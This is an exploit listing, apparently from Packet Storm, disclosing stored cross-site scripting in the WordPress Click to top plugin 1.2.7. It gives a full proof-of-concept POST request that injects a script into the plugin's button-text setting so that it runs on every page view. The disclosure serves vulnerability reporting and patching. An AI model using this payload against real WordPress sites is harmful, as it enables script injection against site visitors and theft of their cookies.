Exploit for WordPress Click To Top 1.2.7 Persistent Cross Site Scripting

Name: Exploit for WordPress Click To Top 1.2.7 Persistent Cross Site Scripting
Rating: 5 (167 reviews)
2020-08-18 | CVSS -0.6
## https://sploitus.com/exploit?id=PACKETSTORM:158901
# Exploit Title: WordPress Click to top Plugin v1.2.7 - Persistent Cross-Site Scripting  
# Date: 2020-08-18  
# Vendor Homepage: http://wpthemespace.com/  
# Vendor Changelog: https://wordpress.org/plugins/click-to-top/  
# Exploit Author: Melbin K Mathew (@melbinkm)  
# Author Advisory: https://melbin.in/2020/08/17/stored-xss-vulnerability-in-change-wordpress-click-to-top-plugin/  
# Author Homepage: https://melbin.in  
# Version: 1.2.7 and below  
  
1. Description  
  
The Click to top WordPress Plugin is used to include scroll to top feature in a WordPress blog. It was found to be vulnerable to a stored Cross-Site Scripting (XSS) vulnerability. The Type scroll text field in the plugin settings page was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the changes. It is triggered when a user loads any page on the website. All WordPress websites using Click to top WordPress Plugin version 1.2.7 and below are affected.  
  
2. Proof of Concept  
POST /w/wp-admin/options.php HTTP/1.1  
Host: 95.217.19.38  
Content-Length: 722  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://95.217.19.38  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://95.217.19.38/w/wp-admin/options-general.php?page=click-to-top.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: wordpress_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1597746976%7CBlobP8KWB7gDuqKN4SYfQexDQcLX5q74H4H2dnZzuRF%7Cb1aafc968a6212fc1ceba7657727836762d457f9b3fc1ac5d8f957c2aa46c16e; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1597746976%7CBlobP8KWB7gDuqKN4SYfQexDQcLX5q74H4H2dnZzuRF%7Cf7f732afdad727391089966b6f76603baec4a9f086a16fa81bc56fe71dfd59ef; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597574177  
Connection: close  
  
option_page=click_top_style&action=update&_wpnonce=2502676c1e&_wp_http_referer=%2Fw%2Fwp-admin%2Foptions-general.php%3Fpage%3Dclick-to-top.php&click_top_style%5Bbtn_style%5D=square&click_top_style%5Bhover_affect%5D=bubble-top&click_top_style%5Bbtn_type%5D=text&click_top_style%5Bselect_icon%5D=angle-double-up&click_top_style%5Bbtn_text%5D=Click+To+Top%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&click_top_style%5Bbg_color%5D=%23cccccc&click_top_style%5Bicon_color%5D=%23000000&click_top_style%5Bbg_hover_color%5D=%23555555&click_top_style%5Bhover_color%5D=%23ffffff&click_top_style%5Bscroll_opacity%5D=99&click_top_style%5Bscroll_padding%5D=5&click_top_style%5Bfont_size%5D=16&submit=Save+Changes